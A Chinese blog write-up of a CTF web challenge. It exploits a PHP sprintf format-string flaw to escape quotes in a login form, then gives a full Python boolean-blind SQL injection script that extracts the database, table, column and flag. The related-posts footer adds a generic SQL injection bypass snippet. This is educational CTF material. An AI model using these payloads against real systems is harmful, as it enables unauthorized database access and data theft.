CTF-“迎圣诞,拿大奖”活动赛题SQLi

最新推荐文章于 2024-03-21 21:05:45 发布
原创 最新推荐文章于 2024-03-21 21:05:45 发布 · 387 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#post #url #cuda #web #甘特图

本文通过一个具体的案例,详细解析了如何利用SQL注入漏洞获取数据库信息,并最终找到flag的过程。涉及了sprintf格式化字符串注入隐患及盲注技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

分值:200分 类型:Web题目名称:SQLi
题目内容:find the flag.

解题步骤

  1. 进入链接,发现是个登录页面,没有注册的地方,填入admin&admin,提示password error!
  2. 分析报文,无异常
  3. intruder一遍,发现username是admin%时报错
    image.png
  4. 显然是sprintf的格式化问题导致单引号逃逸
  5. 尝试各种字符串后,postdata为 username=admin%1$\\' or 1=1 # &password=admin显示password error! . username=admin%1$\\' or 1=2 # &password=admin显示username error! ,显然注入点就是这里了.
  6. 用脚本跑出flag

代码:

#coding:utf-8

import requests
import string

def boom():
    url = r'http://af6add5b19fe4fddad8a5d5e413129df464f7ee5ce6d4a89.game.ichunqiu.com/index.php'
    s = requests.session()
    dic = string.digits + string.letters + "!@#$%^&*()_+{}-="
    right = 'password error!'
    error = 'username error!'

    lens = 0
    i = 0
    while True:
        payload = "admin%1$\\' or " + "length(database())>" + str(i) + "#"
        data={'username':payload,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            lens=i
            break
        i+=1
        pass
    print("[+]length(database()): %d" %(lens))

    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#"
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if right in r:
                strs = strs + c
                print strs
                break
        pass
    pass
    print("[+]database():%s" %(strs))

    lens=0
    i = 1
    while True:
        payload = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#"
        data = {'username':payload,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            lens = i
            break
        i+=1
        pass
    print("[+]length(table): %d" %(lens))

    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) +",1))=" + str(ord(c)) + "#"
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if right in r:
                strs = strs + c
                print strs
                break
        pass
    pass
    print("[+]table_name:%s" %(strs))
    tablename = '0x' + strs.encode('hex')
    table_name = strs

    lens=0
    i = 0
    while True:
        payload = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name = " + str(tablename) + " limit 0,1)>" + str(i) + "#"
        data = {'username':payload,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            lens = i
            break
        i+=1
        pass
    print("[+]length(column): %d" %(lens))

    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if right in r:
                strs = strs + c
                print strs
                break
        pass
    pass
    print("[+]column_name:%s" %(strs))
    column_name = strs

    num=0
    i = 0
    while True:
        payload = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
        data = {'username':payload,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            num = i
            break
        i+=1
        pass
    print("[+]number(column): %d" %(num))

    lens=0
    i = 0
    while True:
        payload = "admin%1$\\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"
        data = {'username':payload,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            lens = i
            break
        i+=1
        pass
    print("[+]length(value): %d" %(lens))

    i=1    
    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
            data = {'username':payload,'password':'1'}
            r = s.post(url,data=data).content
            if right in r:
                strs = strs + c
                print strs
                break
        pass
    pass
    print("[+]flag:%s" %(strs))

if __name__ == '__main__':
    boom()
    print 'Finish!'

知识点

"圣诞拿大奖"——SQLI
Ramona的博客
12-22 733
0x01 本所需知识清单: 1.php sprintf()函数漏洞:https://blog.youkuaiyun.com/WQ_BCJ/article/details/85057447 2.布尔盲注基本playload及流程:https://blog.youkuaiyun.com/WQ_BCJ/article/details/84592445 3.Burpsuit  Intruder暴力猜解:https://...
圣诞拿大奖活动 Web-SQLi
qq_34106499的博客
01-17 604
1. php中sprintf()函数漏洞原理及其利用; 2. mysql盲注语法及python脚本; 3. sqlmap的需要进一步学习;
圣诞拿大奖活动 SQLi
feng的博客
10-02 379
的新姿势就是利用sprintf格式化字符串漏洞来实现SQL注入。
圣诞拿大奖活动_SQLi(sprintf格式化字符)
a173262565的博客
04-08 188
题目应该就是注入没跑了 先拿正常输入试试,输了admin,admin,结果返回password error!,说明还真的存在admin账户 拿常规注入语句试探一下admin' and 1=1%23,发生了报错 红框这里就给了我们提示,记得之前遇上过一个sprintf格式化字符串所引起的漏洞 具体原理可以参考下面这篇文章 sprintf格式化字符串带来的注入隐患 先...
圣诞拿大奖活动------------SQLi
大方子
08-29 1448
========================================= 个人收获 1.sprintf 格式漏洞   =========================================   题目     上来先扫下目录看下源码和http请求发现没有什么奇怪的地方,也就八九不离十是sql注入了   开始想尝试 万能密码 后来发现有过滤 尝试用...
ctfctf-pwn收集
03-31
ctfCTF(夺旗)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF库通常由多个类别的挑战组成,例如Web安全、二...
soreatu#My-CTF-Challenge#ctf设计说明2
07-25
[题目考点]:1. AES加密模式2. 登录协议[是否原创]:原创[题目环境]:[特别注意]:[题目制作过程]:cd ./源码docker build . -t
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF...
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
SQLi 圣诞拿大奖活动 复现
weixin_34015336的博客
05-11 186
题目叫注入,先burp fuzz试一下 出来了一堆长度不一样的,还出了一个这个函数,这个函数大概问就是 逃逸问 比如输入%1$/' 他后端会把这个% 会吧1%/全部给吃掉,就导致单引号逃逸出来了 然后自己布尔盲注就上脚本跑就OK了 转载于:https://www.cnblogs.com/haozhizhi/p/10847167.html...
圣诞拿大奖——SQLI(附sprintf格式化字符串安全问超详解)
g1ut_t0ny的博客
07-03 355
"圣诞拿大奖"——SQLI 0x00题目 结合题目给出的“SQLI”与页面,正常思路是SQL注入,尝试用admin账户登陆,提示password error,证明有admin用户存在,那么就对username进行注入,尝试弱口令 0x01发现注入点 开始在username处进行常规注入,考虑万能密码,所以直接使用burpsuit的intruder跑一下,查看那些字母或者字符没有被过滤掉(waf字典),但发现带有%的response中返回长度不一样,查看回显发现提示 构造username=admin
圣诞拿大奖活动可恶的黑客
lovelj的博客
01-06 2081
话不多说,直接上图 1.每拿到这种题目,我首先直接导出http 2.在文件最后看见一个TXT 3.打开看见这个 4.既然看见了就看看呗,搜索他 5.发现有三个,一个一个打开看呗(发正也是蒙)发现第二个里面有一段Unicode编码 6.那就把它转转看看呗 7.不错,出来了,那就提交呗 什么,居然不对,再看看,没错,复制的对了 那就再看看, 发现flag变f1ag了 在提交,ok ...
[圣诞拿大奖] Sqli writeup
Flyour的博客
03-31 1104
Sqli 的writeup 拿到题目看到的就是一个登录框,可以根据经验进行尝试一下用户名=amdin,密码=admin,得到的结果是password error。然后随便换一个其他的名字进行登录,发现得到的结果是username error。从这里可以看到响应结果会反映出是用户名出错,还是密码出错。 然后尝试进行注入,试了万能密码等注入,结果一直是username error。一开始我以为是w...
ctf-writeup-圣诞拿大奖-SQLi
key_nothing的博客
08-06 426
打开连接,出现一个登录框: 尝试:扫目录、弱口令、源代码都没有什么发现 题目sqli 猜测sql注入应该在登录处,转包丢sqlmap先跑一发,也没有结果。 尝试手工测一下,发现在用户名处输入%时居然有报错! 看报错提示,有sprintf()错误,瞬间想起了这个函数有格式化字符串漏洞,抓包尝试一番。 sprintf注入,或者说php格式化字符串注入的原理为: 要明白%后的一个字符(除了%,%...
CTF——MISC习讲解(流量分析winshark系列)
tlovejr的博客
03-14 7362
CTF——MISC习讲解(流量分析winshark系列) 前言 上一章节我们已经做完一场比的杂项题目,这次给大家介绍一下不一样的,给大家来一期流量分析专,在这个专中,所有的题目链接都整理好了,就不给大家一一展示了,大家可以直接统一下载即可。 一、基础篇-----flag明文 首先打开文件发现以下界面 在这个界面直接ctrl+f,直接搜索flag关键字 然后直接查找就可以看到flag 二、基础篇----flag编码 1、bianma1 这个直接查找flag的话是没有的,所以我们把flag直接编
CTF-辨别细菌
m0_62670778的博客
03-21 1713
使用审查元素选中后查看源代码发现了有意思的东西,问处的data-key的值与答案处的data-key的值有一样的,那那个选项会不会是答案呢?根据源代码的提示后选择答案,发现是正确的,那么接下来就很简单了,只需要一直这样对下去。进入靶场后发现是一个游戏,需要全部答对才可以得到最后的flag。以为会跳出flag来,结果没有,找了半天,在控制台处找到。看不懂没有关系,在答的时候用审查元素查看一下代码试试。根据要求输入名字,随便一个都可以。恭喜我们获得flag,但是要寻找。查看了一下源码,发现有一个。
南邮ctf--Wp
Hydra的博客
10-17 1995
10.15 1.pass check $pass=@$_POST['pass']; $pass1=***********;//被隐藏起来的密码 if(isset($pass)) { if(@!strcmp($pass,$pass1)){ echo "flag:nctf{*}"; }else{ echo "the pass is wrong!"; } }else{ echo "please i...
编码分析(持续更新)
zip471642048的博客
05-17 555
猫咪和键盘 题目地址 : https://ce.pwnthebox.com/challenges?type=1&page=1&diff=medium&id=452 纵向随机切割 with open("typed_printf.cpp","r") as f: lines=f.readlines() #print(lines) for line in lines: seg1=line[0:1] seg2=line[1:7]
[CTF]公司“DSFM-圣诞狂欢”杯安全技能writeup
第八个男人
01-04 745
1. Helloeveryone 2048的小游戏,不用真正打通关,直接F12即可。 2. 数论 s=m*p%q,要求出m,就可以得到flag。 python脚本: p = int('0x9dfe6f4722f783589a955fe381d0308541dc2af910f525008b6265a294eff48846343c59',16) q = int('0xbf80113b43da6b0ad6bf32ba38ead7c936b97c775d3e728dc50d33a21d5e296c.
ctfmy-first-sqli
最新发布
01-19
### CTF SQL Injection Challenge "my-first-sqli": Walkthrough and Solution In the context of Capture The Flag (CTF) competitions, challenges like 'my-first-sqli' provide an opportunity to explore vulnerabilities within web applications through a controlled environment[^1]. This particular challenge focuses on exploiting Structured Query Language (SQL) injection flaws. The objective is typically to bypass authentication mechanisms by manipulating input fields that are not properly sanitized. For instance, consider a login form where users enter their username and password: ```html <form action="login.php" method="POST"> Username: <input type="text" name="username"><br> Password: <input type="password" name="password"><br> <input type="submit" value="Login"> </form> ``` A common approach involves injecting malicious code into these forms. An example payload might look as follows when targeting the `username` field with `' OR '1'='1` which always evaluates true regardless of what exists in the database table for usernames[^2]: #### Exploitation Process To exploit this vulnerability effectively while adhering to ethical guidelines set forth during such events, one would proceed cautiously using tools designed specifically for testing purposes only. Here’s how it could be done programmatically without causing harm or violating rules: ```python import requests url = "http://example.com/login" payloads = ["admin' --", "' OR '1'='1"] for p in payloads: response = requests.post(url, data={'username':p,'password':'anything'}) if "Welcome admin!" in response.text: print(f"[+] Successful exploitation with payload {p}") break else: print("[-] Failed to find working payload.") ``` This script sends POST requests containing crafted inputs aimed at uncovering potential weaknesses related to improper handling of user-supplied information before processing queries against backend databases[^3]. --related questions-- 1. What other types of attacks can occur due to poor validation practices? 2. How do modern frameworks prevent SQL injections from happening? 3. Are there any legal implications associated with participating in CTF exercises involving real-world targets? 4. Can you explain more about different methods used in securing web applications against various attack vectors?
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值